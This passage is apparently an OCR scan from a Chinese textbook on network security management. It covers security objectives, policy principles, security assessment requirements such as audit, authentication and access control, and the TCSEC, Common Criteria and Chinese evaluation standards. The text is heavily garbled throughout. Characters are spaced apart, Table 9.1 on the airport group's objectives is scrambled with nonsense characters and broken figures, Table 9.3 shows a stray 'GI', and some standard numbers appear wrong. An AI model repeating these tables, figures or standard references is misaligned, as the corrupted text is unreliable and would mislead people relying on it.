维护 网 络 系统 的 过 程 中 才能 使 得 顶层 安全 目标 得 以 保证 。 为 了 便于 理解 , 表 9. 1 给 出 了 国 
内 某 机 场 集团 网 络 安全 目标 的 制定 样 例 及 安全 目标 的 分 解 情况 。 


表 9.1 某 机 场 集团 信息 网 络 安全 目标 分 解 情况 






































部 门 | 安全 目标 | ”科室 安全 目标 岗位 安全 目标 
年 度 部 门 责 | 一 年 度 科室 责任 原因 导致 | 年 度 各 岗位 人 员 责 任 原因 
任 原因 导致 | 运行 维护 科 | 的 信息 安全 事故 0 次 。 | 信息 管理 员 | 导致 的 信息 安全 事故 0 次 
的 信息 安全 年 度 科室 责任 原因 导致 年 度 各 岗位 人 员 责任 原因 
事故 0 次 。 | 信息 规划 科 | 的 信息 安全 事故 0 次 。 | 工程 管理 员 | 导致 的 信息 安全 事故 0 次 
年 度 部 门 责 | 一 二 年 度 科室 责任 原因 导致 | 年 度 各 岗位 人 员 责任 原因 
任 原因 导致 | 运行 维护 科 | 的 信息 安全 事件 0 次 。 | 信息 管理 员 | 导致 的 信息 安全 事件 0 次 
的 信息 安全 年 度 科室 责任 原因 导致 年 度 各 岗位 人 员 责任 原因 
事件 0 次。 | 信息 规划 科 | 的 信息 安全 事件 0 次 。 | 工程 管理 员 | 导致 的 信息 安全 事件 0 次 
年 度 部 门 非 年 度 科室 非 人 为 原因 导 年 度 各 岗位 人 员 非 人 为 原 
人 为 原因 导 | 运行 维护 科 | 致 的 信息 安全 事件 千 小 | 信息 管理 员 | 因 导致 的 信息 安全 事件 千 
致 的 信息 安 时 率 不 超过 0. 34 小 时 率 不 超过 0. 028 
全 事件 千 小 年 度 科室 非 人 为 原因 导 年 度 各 岗位 人 员 非 人 为 原 
时 率 不 超过 | 信息 规划 科 | 致 的 信息 安全 事件 千 小 | 工程 管理 员 | 因 导致 的 信息 安全 事件 千 
0. 57 时 率 不 超过 0. 12 小 时 率 不 超过 0. 05 

信 ”| 年 度 部 门人 年 度 科室 人 为 差错 导致 年 度 各 岗位 人 员 人 为 差错 

是 | 为 差错 导致 | 运行 维护 科 | 的 信息 安全 事件 隐患 和 | 信息 管理 员 | 导致 的 信息 安全 事件 隐患 

术 | 的 信息 安全 小 时 率 不 超过 0. 57 千 小 时 率 不 超过 0.047 

部 “| 事件 隐患 二 年 度 科室 人 为 差错 导致 年 度 各 岗位 人 员 人 为 差错 
小 时 率 不 超 | 信息 规划 科 | 的 信息 安全 事件 隐患 千 | 工程 管理 员 | 导致 的 信息 安全 事件 隐患 
过 0.91 小 时 率 不 超过 0. 24 千 小 时 率 不 超过 0. 1 
pp 年 度 信息 系统 二 级 故 年 度 各 岗位 信息 系统 二 级 

| 障 千 小 时 每 万 人 次 率 故障 千 小 时 每 万 人 次 率 不 

ee 运行 维护 科 | 个 超 过 0.0027 信息 管理 员 | 起 过 9.0002 
ee 年 度 各 岗位 信息 系统 二 | 全 年 度 信息 系统 二 级 放 陈 二 
es 级 故障 千 小 时 每 万 人 次 小 时 每 万 人 次 率 不 超过 
率 不 超过 0. 002 0.024 
年 度 部 门 责 年 度 科 宝 责任 原因 导致 | ，u 性 芭 只 | 年 度 各 岗位 责任 原因 导致 
任 原因 导致 | 运行 维护 科 | 的 重要 保密 数据 .信息 | 信号 全 芭 员 | 的 重要 保密 数据 ,信息 淮 
的 重要 保密 泄密 事件 0 次 密 事件 0 次 
数据 .信息 年 度 科室 责任 原因 导致 | 和 从 更 员 | 年 度 各 岗位 责任 原因 导致 
洪 密 事件 | 信息 规划 科 | 的 重要 保密 数据 .信息 | 信介 发 于 员 | 的 重要 保密 数据 ,信息 兴 
0 次 泄密 事件 0 次 i 密 事件 0 次 
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9.2 安全 方针 政策 


网 络 系统 运行 维护 组 织 应 依据 既定 的 安全 目标 、 要 求 ,健全 网 络 系统 安全 运行 保障 的 体 
制 机 制 ,激励 调动 运行 维护 人 员 的 主动 性 积极性 创造 性 ,确立 贯彻 安全 方针 的 基本 理念 ， 
制定 安全 方针 政策 。 


9.2.1 贯彻 安全 方针 的 基本 理念 


在 实施 网 络 安 全 管理 过 程 中 ,运行 维护 组 织 在 明确 安全 目标 的 同时 还 应 该 制定 明确 的 
安全 方针 政策 ,并 有 效 地 贯彻 执行 既定 的 安全 方针 。 在 贯彻 安全 方针 的 过 程 中 应 当 遵照 以 
下 原则 进行 实施 : 
。 牢固 树立 持续 安全 理念 ,正确 处 理 网 络 系统 安全 与 系统 所 服务 机 构 的 安全 和 效益 的 关 
系 ,确保 安全 方针 落实 到 基层 ,落实 到 运行 维护 岗位 ,落实 到 日 常 各 项 运 维 工 作 中 。 

。 运用 系统 安全 理论 ,通过 持续 的 危险 源 识 别 和 风险 管理 过 程 ,将 网 络 系统 风险 控制 
在 可 接受 的 水 平 或 以 下 ,确保 网 络 系统 安全 方案 ,标准 、 措 施 符合 甚至 高 于 国家 , 行 
业 的 网 络 安全 规章 制度 与 标准 。 

。 坚持 将 严格 管理 和 科学 管理 结合 起 来 ,不 断 总 结 经 验 教训 ,不 断 完善 网 络 安 全 管理 

制度 ,程序 和 措施 ,确保 网 络 系统 始终 处 于 安全 稳定 \ 协 调 、 持 续 的 可 控 状 态 。 

”综合 运用 行政 法制、 经济 等 手段 ,不 断 增强 网 络 系统 运行 维护 人 员 的 安全 意识 、 危 

机 意识 和 责任 意识 ,着 力 营造 积极 主动 的 网 络 安全 文化 ,确保 落实 网 络 安全 责任 。 


9.2.2 安全 政策 


网 络 系 统 运行 维护 组 织 可 根据 自身 行业 特点 、 网 络 系统 安全 保护 等 级 需求 以 及 组 织 自 
身 运行 维护 能 力 制定 相 匹 配 的 安全 政策 。 根 据 目 前 业内 网 络 系统 运行 维护 的 案例 与 经 验 ， 
大 多 数 网 络 系统 运行 维护 组 织 所 制定 的 安全 政策 应 包含 但 不 仅 限于 以 下 内 容 : 
。 坚决 遵守 国家 有 关 网 络 安全 的 法 律 法 规 , 以 风险 管理 手段 确保 不 违反 现行 的 法 律 法 
规 , 不 降低 现 有 的 网 络 安全 水 平 ,不 产生 不 可 接受 的 风险 。 
。 实施 安全 目标 责任 制 ,每 年 可 与 组 织 内 各 级 人 员 签 订 安全 目标 责任 书 , 定 期 检查 目 
标 落实 情况 ,年 终 统一 考核 。 
。 建设 学 习 型 运 维 团队 ,培育 积极 主动 的 网 络 安全 文化 ,鼓励 报告 安全 隐患 。 
。 加强 网 络 系统 安全 基础 设施 建设 ,确保 足够 的 投入 ,保证 网 络 系 统 设备 设施 符合 国 
家 规范 标准 ,及 时 治理 隐患 。 


9.3 安全 评估 与 等 级 保护 


9.3.1 安全 评估 内 容 
安全 评估 的 内 容 可 以 分 为 7 个 方面 ,如 图 9.1 所 示 。 
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图 9.1 安全 评估 的 内 容 


1. 安全 体制 

1) 安全 需求 分 析 

在 对 网 络 资源 进行 安全 漏洞 分 析 、 安 全 威胁 分 析 的 基础 上 ,确定 网 络 中 的 安全 风险 ,对 
可 能 产生 的 安全 事故 和 损失 进行 分 析 , 从 而 确定 其 安全 需求 。 

2) 网 络 信息 安全 体制 

根据 安全 需求 , 按 GB 9387. 2 标准 建立 网 络 信息 安全 体制 ,包括 技术 体系 、 管 理 体 系 和 
评估 检测 体系 。 

系统 进行 安全 检测 时 必须 符合 国家 及 相关 部 门 与 安全 相关 的 法 律 \ 法 规 和 标准 的 要 求 ， 
并 由 有 关 部 门 指定 的 检测 机 构 对 系统 的 网 络 信息 安全 进行 检测 。 

2. 安全 管理 

1) 安全 策略 

按照 安全 体制 的 要 求 ,根据 国家 相应 的 安全 法 律 、 法 规 和 标准 确定 安全 方针 和 采取 的 
措施 。 
2) 安全 管理 
建立 相应 的 安全 组 织 并 配备 安全 应 急 处 理 中 心 ,制定 安全 培训 制度 ,从 而 保证 能 够 
及 时 处 理 安全 事故 。 按 国家 保密 法 的 规定 确定 系统 中 各 种 数据 的 密级 ,建立 相应 的 保密 
制度 。 

3. 安全 审计 

(1) 系统 应 该 产生 下 列 可 审计 事件 的 审计 记录 : 

。 审计 功能 的 打开 与 关闭 。 

。 用 户 与 角色 的 关联 与 分 离 。 

。 用 户 身份 认证 机 制 的 使 用 。 

。 失败 的 认证 次 数 。 

。 所 有 数据 传输 的 请 求 及 其 结果 。 

。 所 有 加 、 解 密 操作 的 类 型 和 结果 。 

。 系统 时 间 的 更 改 。 

。 其 他 系统 中 定义 的 审计 事件 。 
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(2) 审计 记录 中 至 少 应 该 包括 下 列 内 容 : 

。 事件 发 生 的 时 间 和 日 期 。 

。 事件 类 型 。 

。 主 ,客体 标识 符 。 

。 事件 结 果 。 

(3) 系统 应 该 赋予 授权 的 管理 员 从 审计 日 志 中 读 取 审计 数据 的 能 力 , 并 以 用 户 可 以 理 
解 的 形式 提供 审计 数据 ,以 及 提供 根据 下 列 属性 对 审计 数据 进行 查找 和 排序 的 功能 : 

。 网 络 地 址 。 

。 事件 发 生 的 时 间 和 日 期 。 

(4) 系统 应 提供 审计 数据 的 保护 ,阻止 对 审计 数据 的 修改 和 非 授 权 删 除 。 

4. 身份 鉴别 

1) 用 户 安全 属性 

系统 应 该 为 每 一 个 用 户 确定 下 列 安全 属性 : 

。 用 户 标识 符 ; 

。 用 户 与 管理 角色 的 关联 ; 

。 系统 中 定义 的 其 他 安全 属性 。 

2) 用 户 身 份 鉴别 

系统 在 执行 由 系统 的 安全 策略 控制 的 并 代表 用 户 的 活动 之 前 ,必须 要 求 该 用 户 进行 身 
份 鉴别 。 

3) 多 重 身份 认证 机 制 

系统 应 该 提供 下 列 多 重 机 制 来 支持 用 户 身份 认证 : 
当 被 授权 的 管理 员 需 要 远程 访问 系统 时 ,系统 必须 使 用 单个 用 户 身 份 认证 机 制 对 其 
身份 进行 认证 ,认证 通过 后 才 可 以 允许 该 授权 管理 员 执 行 任何 由 安全 策略 控制 的 
系统 支持 的 最 基本 的 身份 认证 机 制 应 为 口令 机 制 。 
系统 还 可 以 支持 其 他 的 身份 认证 机 制 ,如 基于 指纹 的 生物 特征 认证 机 制 等 。 

。 在 网 络 环境 中 ,具体 的 身份 认证 机 制 应 该 符合 身份 认证 协议 的 国家 标准 。 

。 当 网 络 中 的 两 个 实体 需要 通信 时 ,相互 之 间 必 须 经 过 身份 认证 才 可 以 进行 。 这 种 身 

份 认证 可 以 通过 可 信 的 第 三 方 进 行 , 且 应 采用 国家 标准 的 网 络 身份 认证 协议 。 

4) 身份 认证 失败 处 理 

系统 应 该 探测 到 用 户 尝试 身份 认证 的 次 数 ,并 在 该 次 数 达 到 系统 预先 定义 的 某 一 数值 
时 拒绝 对 该 用 户 的 身份 认证 ,同时 拒绝 执行 任何 代表 该 用 户 的 活动 。 

5. 访问 控制 和 数据 保护 

1) 数据 传输 规则 

当 有 数据 在 网 络 中 流动 时 ,应 依据 下 列 属性 实施 传输 规则 : 

。 源 地 址 ; 

。 目的 地 址 ; 

。 传输 层 协议 ; 
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。 数据 流入 流出 的 物理 和 人 逻辑 接口 ; 

。 网 络 服务 类 型 ; 

。 其 他 系统 定义 的 安全 属性 。 

数据 传输 可 以 使 用 上 述 部 分 或 全 部 属性 。 

在 传输 过 程 中 系统 应 保证 数据 来 自 正确 的 发 送 方 而 非 假冒 方 ,数据 送 到 了 正确 的 接收 
方 而 没有 丢失 或 误 送 , 收 与 发 的 内 容 一 致 。 

2) 数据 传输 的 保护 

系统 应 该 保证 网 络 中 传输 的 数据 的 机 密 性 和 完整 性 。 保 证 数据 在 处 理 、 传 输 过 程 中 不 
被 窃取 和 算 改 。 应 按照 国家 相应 的 密码 协议 规定 对 敏感 数据 进行 加 密 传输 。 

6. 不 可 抵赖 性 

1) 源 抵赖 阻止 

当 数 据 传输 时 ,系统 应 该 强制 产生 数据 传输 源 的 证 据 , 并 提供 验证 该 证 据 的 手段 。 这 种 
手段 可 以 借助 国家 相应 的 密码 协议 和 标准 获得 。 

2) 目的 抵赖 阻止 

当 数 据 传 输 时 ,系统 应 该 强制 产生 数据 传输 目的 的 证 据 , 并 提供 验证 该 证 据 的 手段 。 这 
种 手段 可 以 借助 国家 相应 的 密码 协议 和 标准 获得 。 

7. 物理 安全 

1) 机 房 安 全 

网 络 系统 必须 按 GB/T 9361 一 2011《 计 算 机 场地 安全 要 求 ) 和 GB/T 2887 一 2011《 计 算 
机 场地 通用 规范 ) 的 要 求 建立 机 房 。 

2) 设备 安全 

网 络 系统 中 所 有 设备 必须 符合 GB/T 4943 一 2011《 信 息 技术 设备 安全 》 和 GB/T 
9254 一 2008( 信 息 技术 设备 的 无 线 电 骚扰 限 值 和 测量 方法 》 对 设备 安全 的 要 求 。 
9.3.2 安全 评估 标准 

在 实施 网 络 系统 过 程 中 ,检测 和 评估 是 保障 网 络 信息 安全 与 保密 的 重要 措施 , 它 能 够 把 
不 符合 要 求 的 设备 或 系统 拒 之 门 外 。 国 际 上 已 经 为 此 制定 了 许多 相关 的 标准 ,国内 也 已 经 
建立 了 十 几 个 不 同 专业 的 检测 评估 中 心 。 

安全 检测 与 评估 是 一 项 十 分 艰巨 的 任务 。 在 网 络 环境 下 ,许多 因素 是 动态 的 、 不 确定 
的 、 随 机 的 ,有 些 因 素 还 与 敌对 双方 的 技术 水 平 、 能 力 .各 种 威胁 和 攻击 手段 及 对 策 相 关 。 究 
竟 该 如 何 进行 安全 评估 呢 ? 

一 种 可 行 有 效 的 思路 是 : 先进 行 各 个 单项 检测 与 评估 ,然后 再 进行 综合 检测 与 评估 , 即 
由 局 部 到 整体 , 巾 单 功能 到 多 功能 ,逐步 完善 。 重 点 考虑 网 络 故障 类 型 .网络 告 警 原因 故障 
严重 性 级 别 .故障 阔 值 .故障 修复 和 故障 频次 等 。 

9.3.2.1 安全 评估 标准 发 展 概况 

安全 标准 是 安全 理论 和 技术 的 总 结 ,对 安全 产品 的 功能 、 结 构 及 交互 操作 都 提出 了 要 
求 。 安 全 标准 的 制定 也 是 一 个 国家 科研 水 平 、 技 术 能 力 的 体现 ,反映 了 一 个 国家 的 综合 实 
力 。 安 全 标准 还 是 加 入 WTO 的 国家 保护 自己 利益 的 重要 手段 。 因 此 ,各 国都 很 重视 安全 
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标准 的 研究 、 制 定 和 推广 工作 。 

美国 是 安全 评估 的 发 源 地 。 早 在 20 世纪 70 年 代 , 美 国 就 开展 了 有 关 信 息 安全 测评 认 
证 的 研究 工作 ,并 于 1985 年 由 美国 国防 部 正式 发 布 了 著名 的 《可 信任 计算 机 系统 评价 准则 》 
(Trusted Computer System Evaluation Criteria,TCSEC) ,由 于 该 书 封面 是 橘 色 , 因 此 俗称 
“ 橘 皮 书 ”。 这 是 国际 上 公认 的 第 一 个 计算 机 信息 系统 评估 标准 。“ 橘 皮 书 ”论述 的 重点 是 通 
用 的 操作 系统 ,为 了 使 它 的 评判 方法 适用 范围 更 广 ,1987 年 出 版 了 一 系列 增补 解释 ,如 《可 
信 计 算 机 数据 库 解 释 》( “黄皮书 ”7 《可 信 计 算 机 网 络 解释 》( “红皮书 ”等 ,俗称 "彩虹 系列 ”。 
其 中 光 红 皮 书 ?在 “ 橘 皮 书 ”的 基础 上 增加 了 与 网 络 安全 评估 有 关 的 解释 与 说 明 , 从 网 络 安全 
的 角度 出 发 ,解释 了 准则 中 的 观点 ,从 用 户 登 录 、 授 权 管理 .访问 控制 .审计 跟踪 、 隐 通道 分 
析 、 可 信 通 道 建立 .安全 检测 .生命 周期 保障 ,文本 写作 、 用 户 指南 等 各 个 方向 提出 了 规范 性 
要 求 。 

“ 橘 皮 书 ” 是 应 用 最 早 .影响 最 大 的 计算 机 安全 评估 标准 , 它 带 动 了 国际 计算 机 安全 的 评 
估 研 究 。 但 是 随 着 时 间 推 移 “ 橘 皮 书 ” 暴 露出 严重 的 局 限 性 , 它 偏 重 于 信息 安全 的 保密 性 ， 
而 对 于 完整 性 与 可 用 性 没有 给 予 足够 的 重视 。 因 此 ,在 随后 的 十 多 年 里 ,欧美 各 国都 积极 开 
发 建立 在 TCSEC 基础 上 的 评估 准则 ,这 些 准则 更 灵活 ,也 更 适应 IT 技术 的 发 展 。 

1991 年 ,英国 .法国 和 荷兰 等 欧洲 国家 联合 提出 了 欧洲 (信息 技术 安全 评估 准则 》 
(ITSEC)。ITSEC 作为 多 国安 全 评估 标准 的 产物 ,应 用 于 军队 、 政 府 和 商用 部 门 , 它 以 超越 
TCSEC 为 目的 ,并 将 安全 概念 分 为 “功能 ”与 “保证 ”两 部 分 。“ 功 能 ” 指 为 满足 安全 需求 而 采 
取 的 一 系列 技术 安全 措施 ,如 访问 控制 审计、 鉴别 和 数字 签名 等 。“ 保 证 ”是 指 确保 功能 正 
确实 现 及 其 有 效 性 的 安全 措施 。ITSEC 中 还 首次 提出 了 安全 目标 的 概念 ,包括 对 被 评估 产 
品 或 系统 安全 功能 的 具体 规定 及 其 使 用 环境 的 描述 。 

1989 年 ,加拿大 可 信 计 算 机 产品 评估 准则 CTCPEC 1. 0 版 公布 , 它 是 专 为 政府 需求 而 
设计 ,1993 年 又 公布 了 3.0 版 。 作 为 ITSEC 和 TCSEC 的 结合 ,CTCPEC 将 安全 分 为 功能 
性 要 求 和 保证 性 要 求 两 部 分 。 功 能 性 要 求 分 为 机 密 性 、 完 整 性 .可 用 性 和 可 控 性 四 大 类 ,在 
每 种 要 求 下 又 分 成 许多 级 以 表示 功能 性 的 差别 。 

20 世纪 90 年 代 初 ,美国 为 适应 信息 技术 的 发 展 和 加 强 美国 国内 非 军 用 信息 技术 产品 
的 安全 性 ,对 TCSEC 进行 了 修订 。 首 先 ,针对 TCSEC 的 C2 级 要 求 提出 了 适用 于 商业 组 织 
和 政府 部 门 的 最 小 安全 功能 要 求 (MSFR)。 后 来 ,在 MSFR 和 加 拿 大 CTCPEC 的 基础 上 ， 
美国 1992 年 年 底 公布 了 FC 草案 1.0 版 , 它 是 结合 北美 和 欧洲 有 关 评估 准则 概念 的 另 一 标 
准 。 在 此 标准 中 引入 了 “保护 轮廓 ”这 一 重要 概念 ,每 个 保护 轮廓 都 包括 功能 部 分 、 开 发 保证 
部 分 和 测评 部 分 。 其 分 级 方式 和 TCSEC 不 同 , 充 分 吸收 了 ITSEC、CTCPEC 的 优点 ,主要 
供 美 国政 府 、 民 间 和 商业 使 用 。 

全 球 IT 市 场 的 发 展 ,需要 标准 化 的 信息 安全 评估 结果 在 一 定 程度 上 可 以 互相 认可 ,以 
减少 各 国 在 此 方面 的 一 些 不 必要 的 开支 ,从 而 推动 全 球 信息 化 的 发 展 。 国 际 标准 化 组 织 从 
1990 年 开始 着 手 编写 (国际 标准 评估 准则 》, 简 称 “ 通 用 准则 (CC)”,1996 年 ,颁布 了 1.0 版 ， 
1998 年 颁布 了 2.0 版 ,1999 年 6 月 ISO 正式 将 CC 2. 0 作为 国际 标准 ISO 15408 发 布 。 在 
CC 中 充分 突出 “保护 轮廓 ”, 将 评估 过 程 分 为 “功能 ”和 “保证 ”两 个 部 分 ,此 通用 准则 是 目前 
最 全 面 的 信息 技术 评估 准则 。 

由 于 信息 系统 和 安全 产品 的 安全 性 评估 具有 特殊 性 ,各 国都 不 会 无 条 件 地 接受 由 他 国 
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所 作 的 评估 结果 ,大 多 数 国 家 都 要 通过 本 国标 准 的 测试 才 给 予 认 可 。 因 此 ,很 少 有 国家 会 把 
信息 安全 产品 和 系统 的 安全 性 建立 在 国际 的 评估 标准 、 评 估 体 系 和 评估 结果 的 基础 上 ,而 是 
在 充分 借鉴 国际 标准 的 前 提 下 ,制定 本 国 的 安全 评估 标准 。 
我 国 从 20 世纪 90 年 代 开始 起 草 国 内 的 安全 评估 标准 ,1999 年 9 月 13 日 发 布 了 (计算 
机 信息 系统 安全 保护 等 级 划分 准则 》, 并 于 2001 年 1 月 1 日 起 实施 。 该 标准 的 配套 标准 也 
在 制定 和 修订 中 。 
9.3.2.2 国际 安全 标准 
ls TESEG 
TCSEC 的 发 布 主要 有 以 下 3 个 目的 : 
。 为 制造 商 提供 安全 标准 ,使 他 们 在 开发 商业 产品 时 加 入 相应 的 安全 因素 ,为 用 户 提 
供 广泛 可 信 的 应 用 系统 。 
。 为 国防 部 各 部 门 提供 度量 标准 ,用 来 评估 计算 机 系统 或 其 他 敏感 信息 的 可 信 程 度 。 
。 在 分 析 、 研 究 和 制定 规范 时 ,为 制定 安全 方面 的 需求 提供 基础 。 
TCSEC 根据 以 下 几 个 方面 进行 安全 性 评估 : 
。 安全 策略 。 必 须 有 明确 的 由 系统 实施 的 安全 策略 。 
。 识别 。 必 须 唯一 而 可 靠 地 识别 每 个 主体 ,以 便 检查 主体 /客体 的 访问 请 求 。 
。 标记。 必须 给 每 个 客体 (目标 ) 作 一 个 “标号 ”, 指 明 该 客体 的 安全 级 别 。 这 种 结合 必 
须 做 到 对 该 目标 进行 访问 请 求 时 都 能 得 到 该 标号 以 便 进行 对 比 。 
。 可 检查 性 。 系 统 对 影响 安全 的 活动 必须 维持 完整 而 安全 的 记录 。 这 些 活动 包括 系 
统 新 用 户 的 引入 .主体 或 客体 的 安全 级 别 的 分 配 和 变化 以 及 拒绝 访问 的 企图 。 
。 保障 措施 。 系 统 必 须 包含 实施 安全 性 的 机 制 并 能 评价 其 有 效 性 。 
。 连续 的 保护 。 实 现 安全 性 的 机 制 必 须 受到 保护 以 防止 未 经 批准 的 改变 。 
TCSEC 作为 军用 标准 ,提出 了 美国 在 军用 信息 技术 安全 性 方面 的 要 求 。 由 于 当时 技术 
和 应 用 的 局 限 性 ,TCSEC 提出 的 要 求 主 要 针对 没有 外 部 连接 的 多 用 户 操作 系统 。 安 全 等 级 
从 低 到 高 分 为 成 4 个 大 类 (D.C、B、A) 和 7 个 小 类 (D、Cl1、C2、B1、B2、B3、A), 每 一 级 要 求 涵 
盖 安 全 策略 .责任 、 保 证 和 文档 4 个 方面 。 后 来 ,为 适应 信息 技术 的 发 展 又 陆续 颁布 了 一 系 
列 的 解释 性 文件 ,如 “可 信和 网 络 解释 (TND” 和 “可 信和 数据 库 管理 系统 说 明 (TDD”。 
各 安全 等 级 的 主要 特征 参见 表 9. 2。 


表 9.2 TCSEC 安全 等 级 





安全 等 级 名 称 主要 特征 
A 可 验证 的 安全 设计 ”形式 化 的 最 高 级 描述 和 验证 ,形式 化 的 隐蔽 通道 分 析 , 非 形式 化 的 代 
码 一 致 性 证 明 
B3 安全 域 机 制 安全 内 核 ,高 抗 渗 透 能 力 


B2 结构 化 安全 保护 设计 系统 必须 有 一 个 合理 的 总 体 设计 方案 ,面向 安全 的 体系 结构 , 遵 
循 最 小 授权 原则 , 较 好 的 抗 渗透 能 力 ,访问 控制 应 对 所 有 的 主体 和 客 
体 进行 保护 ,对 系统 进行 隐蔽 通道 分 析 

Bl 标号 安全 控制 除了 C2 级 的 安全 需求 外 ,增加 了 安全 策略 模型 数据 标号 (安全 和 属 
性 ) .托管 访问 控制 
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续 表 
安全 等 级 名 称 主要 特征 
C2 受 控 的 访问 控制 存 取 控制 以 用 户 为 单位 ,进行 广泛 的 审计 ,如 UNIX、Linux、 Windows 
等 操作 系统 
Cl 选择 的 安全 保护 。” 有 选择 的 存 取 控制 ,用 户 与 数据 分 离 ,数据 的 保护 以 用 户 组 为 单位 
D 最 小 保护 保护 措施 很 少 ,几乎 没有 安全 防范 功能 ,如 DOS、Windows 等 操作 系统 


在 这 7 个 级 别 中 ,Bl1 级 和 B2 级 的 级 差 最 大 ,因为 只 有 B2、B3 和 A 级 才 是 真正 的 安全 
等 级 ,它们 至 少 经 得 起 程度 不 同 的 严格 测试 和 攻击 。 目 前 ,我 国 计 算 机 的 操作 系统 大 都 是 引 
进 国 外 的 Cl 级 和 C2 级 产品 。 因 此 ,开发 我 国 自己 的 高 级 别 的 安全 操作 系统 和 数据 库 的 任 
务 迫 在 眉 睫 。 

2: CC 

CC 作为 国际 标准 ,对 信息 系统 的 安全 功能 、 安 全 保障 给 出 了 分 类 描述 ,并 在 综合 考虑 
信息 系统 的 资产 价值 威胁 等 因素 后 ,对 被 评估 对 象 提出 了 安全 需求 (保护 轮廓 ,PP) 及 安全 
实现 (安全 目标 ,ST) 等 方面 的 评估 。 由 于 CC 评价 准则 的 文本 元 长 ,表述 抽象 , 非 专业 人 员 
阅读 存在 一 定 的 困难 ,因此 这 里 简单 介绍 CC 的 思想 。 

CC 重点 考虑 人 为 的 信息 威胁 ,无 论 是 有 意 的 还 是 无 意 的 ,也 可 用 于 非 人 为 因素 导致 的 
威胁 。CC 适用 于 硬件 .固件 和 软件 实现 的 信息 技术 安全 措施 ,而 某 些 内 容 因 涉及 特殊 专业 
技术 或 仅 是 信息 技术 安全 的 外 围 技术 ,因此 不 在 CC 的 范围 内 ,例如 : 

。 CC 不 包括 那些 与 信息 技术 安全 措施 没有 直接 关联 的 、 属 于 行政 性 管理 安全 措施 的 
安全 评估 准则 。 在 评估 对 象 (Target of Evaluation，ToE) 的 运行 环境 中 ,这 类 管理 
安全 措施 被 认为 是 ToE 安全 使 用 的 前 提 条 件 。 

。 CC 不 专门 针对 信息 技术 安全 性 的 物理 方面 (如 电磁 辐射 控制 ) 的 评估 。 

。 CC 不 涉及 评估 方法 学 ,也 不 涉及 评估 机 构 使 用 CC 的 管理 模式 或 法 律 框 架 。 

。 评估 结果 用 于 产品 和 系统 认可 的 过 程 不 在 CC 的 范围 之 内 。 

。 CC 不 包括 密码 算法 固有 质量 评价 准则 。 

CC 由 一 系列 截然 不 同 但 又 相互 关联 的 部 分 组 成 ,全 文 包括 3 个 部 分 : 

。 第 一 部 分 : 简介 和 一 般 模型 。 这 一 部 分 介绍 了 CC 的 一 般 概念 和 格式 ,描述 了 CC 
的 结构 和 适用 范围 ,以 及 安全 功能 保证 需求 的 定义 ,并 给 出 了 保护 轮廓 和 安全 目标 
的 结构 。 

。 第 二 部 分 : 安全 功能 要 求 。 这 一 部 分 为 用 户 和 开发 者 提供 了 一 系列 安全 功能 组 件 ， 
作为 表述 评估 对 象 功能 要 求 的 标准 方法 ,在 保护 轮廓 和 安全 目标 中 将 使 用 这 些 功 能 

。 第 三 部 分 ; 安全 保证 要 求 。 这 一 部 分 为 开发 者 提供 了 一 系列 安全 保证 组 件 , 作 为 表 
述评 估 对 象 保证 要 求 的 标准 方法 ,同时 还 提出 了 7 个 评估 保证 级 别 (Evaluation 
Assurance Level,EAL)。 各 保证 级 别 与 TCSEC 等 级 别 的 大 致 对 应 关系 如 表 9. 3 
所 示 。 
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表 9.3 CC 评估 保证 级 别 与 TCSEC 的 对 照 





CC 保证 级 别 CC 保证 级 别名 称 对 应 的 TCSEC 等 级 
EAL1 功能 测试 GI 
EAL2 结构 测试 Cl 
EAL3 功能 测试 与 校 验 C2 
EAL4 系统 的 设计 测试 和 评审 Bl 
EAL5 半 形 式 化 设计 和 测试 B2 
EAL6 半 形 式 化 验证 的 设计 和 测试 B3 
EAL7 形式 化 验证 的 设计 和 测试 A 


CC 的 3 个 部 分 相互 依存 , 缺 一 不 可 ,第 一 部 分 介绍 CC 的 基本 概念 和 基本 原理 ,第 二 部 
分 提出 了 技术 要 求 , 第 三 部 分 提出 了 非 技 术 要 求 和 对 开发 过 程 、 工 程 过 程 的 要 求 。 

CC 作为 评估 信息 技术 产品 和 系统 安全 性 的 世界 性 通用 准则 ,是 信息 技术 安全 性 评估 
结果 国际 互 认 的 基础 。 早 在 1998 年 1 月 ,经 过 两 年 的 密切 协商 ,美国 ,加 拿 大 法国、 德国 以 
及 英国 的 政府 组 织 签订 了 历史 性 的 安全 评估 互 认 协 议 :《IT 安全 领域 内 CC 认可 协议 》。 根 
据 该 协议 ,在 协议 签署 国 范围 内 ,在 某 个 国家 进行 的 基于 CC 的 安全 评估 将 在 其 他 国家 得 到 
承认 。 对 IT 产品 及 保护 轮廓 的 安全 评估 来 说 ,此 协议 的 签订 代表 着 该 领域 的 一 个 重要 进 
步 , 该 协议 的 参与 者 在 这 个 领域 内 有 着 共同 的 目的 ,主要 如 下 : 

。 确 保 IT 产品 及 保护 轮廓 的 评估 遵循 一 致 的 标准 ,为 这 些 产品 及 保护 轮廓 的 安全 提 

供 足 够 的 信心 。 

。 在 国际 范围 内 提高 那些 经 过 评估 的 、 安 全 性 增强 的 IT 产品 及 保护 轮廓 的 可 用 性 。 

。 消除 IT 产品 及 保护 轮廓 的 重复 评估 ,改进 安全 评估 的 效率 及 成 本 ,改进 IT 产品 及 

保护 轮廓 的 证 明确 认 过 程 。 

根据 CC 认可 协议 ,已 经 获得 CC 证 书 的 IT 产品 及 保护 轮廓 在 使 用 前 不 必 再 经 过 评估 
及 证 明 / 确 认 。 协 议 中 规定 了 在 何 种 情况 下 ,协议 方 都 将 接受 或 承认 其 他 协议 方 进行 的 IT 
安全 评估 及 相关 证 明 /确认 。 由 签约 各 方 代表 组 成 的 管理 委员 会 将 负责 有 关 该 协议 的 执行 
及 其 他 相关 事务 。 目 前 加 入 CC 互 认 协 定 的 国家 有 澳大利亚 、 新 西 兰 `. 加 拿 大 .芬兰 法国、 
德国 希腊、 以 色 列 意大利、 荷兰 挪威、 西班牙 瑞典 奥地利、 英国 及 美国 。 


9.3.2.3 国内 安全 标准 

1.《 计 算 机 信息 系统 安全 保护 等 级 划分 准则 》(GB/T 7859 一 1999) 

我 国 制定 了 强制 性 国家 标准 (计算 机 信息 系统 安全 保护 等 级 划分 准则 》。 该 准则 于 
1999 年 9 月 13 日 由 国家 质量 技术 监督 局 发 布 ,于 2001 年 1 月 1 日 起 实施 。 《计算 机 信息 系 
统 安全 保护 等 级 划分 准则 》 是 建立 安全 等 级 保护 制度 ,实施 安全 等 级 管理 的 重要 基础 性 标 
准 。 它 将 计算 机 信息 系统 安全 保护 等 级 划分 为 5 个 级 别 : 

